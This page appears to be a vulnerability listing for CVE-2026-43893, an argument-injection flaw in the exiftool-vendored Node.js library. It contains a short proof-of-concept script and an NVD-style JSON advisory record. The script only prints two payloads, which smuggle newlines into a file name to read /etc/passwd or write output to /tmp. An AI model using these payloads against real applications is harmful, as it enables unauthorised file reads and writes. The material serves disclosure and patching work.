CVE-2026-43893

// Proof of Concept for CVE-2026-43893 // This demonstrates how a newline in a user-supplied string // can lead to argument injection in exiftool-vendored. const exiftool = require('exiftool-vendored').exiftool; async function exploit() { console.log("[+] Simulating CVE-2026-43893 Argument Injection"); // Scenario 1: Injecting a newline to split arguments // Suppose the application takes a filename from user input. // Normal input: "image.jpg" // Malicious input: "image.jpg\n-echo\n${/etc/passwd}" // The newline splits the 'filename' argument, injecting '-echo' and '${/etc/passwd}' as new commands. const maliciousInput = "image.jpg\n-echo\n${/etc/passwd}"; console.log(`[!] Malicious Payload prepared: ${JSON.stringify(maliciousInput)}`); console.log("[!] Payload contains a newline character (\\n) which splits the argument."); // Scenario 2: Attempting to write output to an arbitrary location // Using the newline to inject the '-o' (out) argument. const writePayload = "image.jpg\n-o\n/tmp/malicious_output.txt"; console.log(`[!] Write Payload prepared: ${JSON.stringify(writePayload)}`); console.log("[!] If processed by vulnerable exiftool-vendored (< 35.19.0), this could write output to /tmp/"); // Note: Actual execution requires a vulnerable environment and specific API usage. // The fix in 35.19.0 specifically checks for \n, \r, and \0 characters to prevent this. } exploit().catch(console.error);

{"cve": {"id": "CVE-2026-43893", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:14.033", "lastModified": "2026-05-11T22:22:14.033", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "exiftool-vendored provides cross-platform Node.js access to ExifTool. Prior to 35.19.0, exiftool-vendored starts ExifTool in -stay_open True -@ - mode, where arguments are read from stdin one per line. In affected versions, several caller-supplied strings were interpolated into ExifTool arguments without rejecting line delimiters. A newline or carriage return inside one of those strings could split a single intended argument into multiple ExifTool arguments, allowing argument injection. The fix also rejects NUL bytes as unsafe control characters. Applications that pass attacker-controlled strings to affected APIs may allow an attacker to make ExifTool read files accessible to the ExifTool process, or write output to attacker-chosen file system paths accessible to that process. No remote code execution has been demonstrated. This vulnerability is fixed in 35.19.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://github.com/photostructure/exiftool-vendored.js/security/advisories/GHSA-cw26-7653-2rp5", "source": "[email protected]"}]}}